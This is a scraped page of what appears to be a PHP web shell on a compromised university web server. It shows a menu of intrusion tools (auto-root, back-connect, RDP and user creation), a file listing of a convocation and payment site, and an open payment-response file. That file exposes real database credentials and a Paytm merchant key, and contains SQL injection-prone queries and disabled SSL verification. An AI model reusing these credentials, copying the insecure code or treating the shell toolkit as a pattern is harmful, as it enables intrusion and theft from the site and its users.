Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.59.88.8
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
kus /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
captcha
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
photos
[ DIR ]
drwxrwxr-x
phpmailer
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxrwxr-x
tmpphotos
[ DIR ]
drwxrwxrwx
AdminMainPage.php
2.15
KB
-rwxr-xr-x
CollegeMainPage.php
2.18
KB
-rwxr-xr-x
Convo_33rd_Notification.pdf
1.83
MB
-rw-r--r--
Convo_34th_Notification.pdf
1.16
MB
-rw-rw-r--
PhD_28th_Convo.pdf
275.13
KB
-rwxr-xr-x
PhD_28th_Convo_lllklk.pdf
275.14
KB
-rwxr-xr-x
PhD_28th_Convo_old.pdf
274.61
KB
-rwxr-xr-x
PhD_29th_Convo.pdf
334.06
KB
-rwxr-xr-x
PhD_29th_Convo_12022019.pdf
332.43
KB
-rwxr-xr-x
PhD_30th_Convo.pdf
201.4
KB
-rwxr-xr-x
PhD_30th_Convo_24022020.pdf
268.68
KB
-rwxr-xr-x
PhD_30th_Convo_25072020.pdf
185.54
KB
-rwxr-xr-x
PhD_30th_Convo_27112019.pdf
256.14
KB
-rwxr-xr-x
PhD_31th_Convo.pdf
198.87
KB
-rw-rw-r--
PhD_31th_Convo5.pdf
225.92
KB
-rw-rw-r--
PhD_31th_Convo6.pdf
240.58
KB
-rw-rw-r--
PhD_31th_Convo_old_28022022.pd...
152.76
KB
-rw-r--r--
PhD_33rd_Convo1.pdf
178.5
KB
-rw-r--r--
PhD_33rd_Convo4.pdf
202.7
KB
-rw-r--r--
PhD_34th_Convo1.pdf
177.88
KB
-rw-rw-r--
PhD_34th_Convo2.pdf
193.49
KB
-rw-r--r--
admin_login.php
6.38
KB
-rwxr-xr-x
app.php
783
B
-rwxr-xr-x
cconfig.php
1.22
KB
-rwxr-xr-x
cconfig_old.php
1.15
KB
-rwxr-xr-x
circular1.pdf
1.66
MB
-rw-r--r--
circular1_060921.pdf
989.12
KB
-rwxr-xr-x
circular_05112018.pdf
770.36
KB
-rwxr-xr-x
circular_old.pdf
658.87
KB
-rwxr-xr-x
college_login.php
6.91
KB
-rwxr-xr-x
home.html
14.17
KB
-rwxr-xr-x
home_admin.html
7.13
KB
-rwxr-xr-x
home_college.html
5.98
KB
-rwxr-xr-x
homeold.html
12.31
KB
-rwxr-xr-x
index.html
11.25
KB
-rwxr-xr-x
index_10102017.html
8.27
KB
-rwxr-xr-x
index_old.html
8.13
KB
-rwxr-xr-x
indexold.html
7.14
KB
-rwxr-xr-x
indexpage.php
2.18
KB
-rwxr-xr-x
indexstop.php
2.33
KB
-rwxr-xr-x
payment_gate_way_responce.php
2.64
KB
-rwxr-xr-x
payment_gateway.php
7.62
KB
-rwxr-xr-x
pgResponse.php
4.58
KB
-rwxr-xr-x
pgResponse_wait_01012019.php
4.3
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgResponse_wait_01012019.php
<?php require_once("links/header.php"); ?> <div class="page-container" style='margin-top:111px;'> <!-- BEGIN CONTENT --> <div class="page-content-wrapper"> <div class="page-content"> <?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); $paytmChecksum = ""; $paramList = array(); $isValidChecksum = "FALSE"; $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $dbname = "logisys3_kus"; $conn = new mysqli($servername, $username, $password, $dbname); $paramList = $_POST; $paytmChecksum = isset($_POST["CHECKSUMHASH"]) ? $_POST["CHECKSUMHASH"] : ""; //Sent by Paytm pg //Verify all parameters received from Paytm pg to your application. Like MID received from paytm pg is same as your application?s MID, TXN_AMOUNT and ORDER_ID are same as what was sent by you to Paytm PG for initiating transaction etc. $isValidChecksum = verifychecksum_e($paramList, 'CC_cHhDZDqzUskbQ', $paytmChecksum); //will return TRUE or FALSE string. echo $isValidChecksum; if($isValidChecksum == "TRUE") { $status = $_POST["STATUS"]; //$status = 'success'; $productinfo = $_POST["ORDERID"]; $txnid = $_POST["TXNID"]; $MID = $_POST["MID"]; $CHECKSUMHASH = $_POST["CHECKSUMHASH"]; //echo $productinfo; //$productinfo = '103E3050155'; $MID = 'KuvUni77420253992631'; $requestParamList = array(); $responseParamList = array(); $requestParamList = array("MID" => "{$MID}" , "ORDERID" => "{$productinfo}"); $checkSum = getChecksumFromArray($requestParamList,'CC_cHhDZDqzUskbQ'); $requestParamList['CHECKSUMHASH'] = urlencode($checkSum); $data_string = "JsonData=".json_encode($requestParamList); $update = "update dctran set FPAYREMARKS='{$data_string}', FPAYSTATUS='{$status}',FPAYDATE=now(),FTRANID='{$txnid}' where FAPPNO='{$productinfo}'"; $result=$conn->query($update); $ch = curl_init(); // initiate curl //$url = "https://pguat.paytm.com/oltp/HANDLER_INTERNAL/getTxnStatus?"; // where you want to post data $url = "https://secure.paytm.in/oltp/HANDLER_INTERNAL/getTxnStatus?"; // where you want to post data curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, true); // tell curl you want to post something curl_setopt($ch, CURLOPT_POSTFIELDS,$data_string); // define what you want to post curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the output in string format $headers = array(); $headers[] = 'Content-Type: application/json'; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $output = curl_exec($ch); // execute $info = curl_getinfo($ch); $data = json_decode($output, true); echo $data; //echo "<b>Checksum matched and following are the transaction details:</b>" . "<br/>"; if ($data["STATUS"] == "TXN_SUCCESS") { $status = $data["STATUS"]; $productinfo = $data["ORDERID"]; $txnid = $data["TXNID"]; $MID = $data["MID"]; $CHECKSUMHASH = $data["CHECKSUMHASH"]; $txnid = $data['TXNID']; $firstname = 'Paytm'; $status = 'success'; $update = "update dctran set FPAYREMARKS='{$data_string}', FPAYSTATUS='{$status}',FPAYDATE=now(),FTRANID='{$txnid}' where FAPPNO='{$productinfo}'"; $result=$conn->query($update); echo " <div class='col-xs-9 center-block' style='float:none;margi:0 auto;'> <h1 style='color:green;'>Thank You. Your payment status is ". $status ."</h1>"; echo "<h2>Your Transaction ID for this transaction is ".$txnid.".</h2>"; echo "<h3>We have received a payment of Rs. " . $amount ."</h3>"; $html='<button class="btn blue" onclick=\'CMS.PrintNETBANKCertifcatepaytm("'.$productinfo.'");\' type="button"><i class="fa fa-download"></i> Print Acknowledgement</button>'; $html.='</div> '; echo $html; //} } else { echo "<b>Transaction status is failure</b>" . "<br/>"; } /* if (isset($_POST) && count($_POST)>0 ) { foreach($_POST as $paramName => $paramValue) { echo "<br/>" . $paramName . " = " . $paramValue; } } */ } /* else { echo "<b>Checksum mismatched.</b>"; //Process transaction as suspicious. } */ ?> </div> <?php require_once("links/footer.php");?> </div> </div> </br> </body> </html>
Close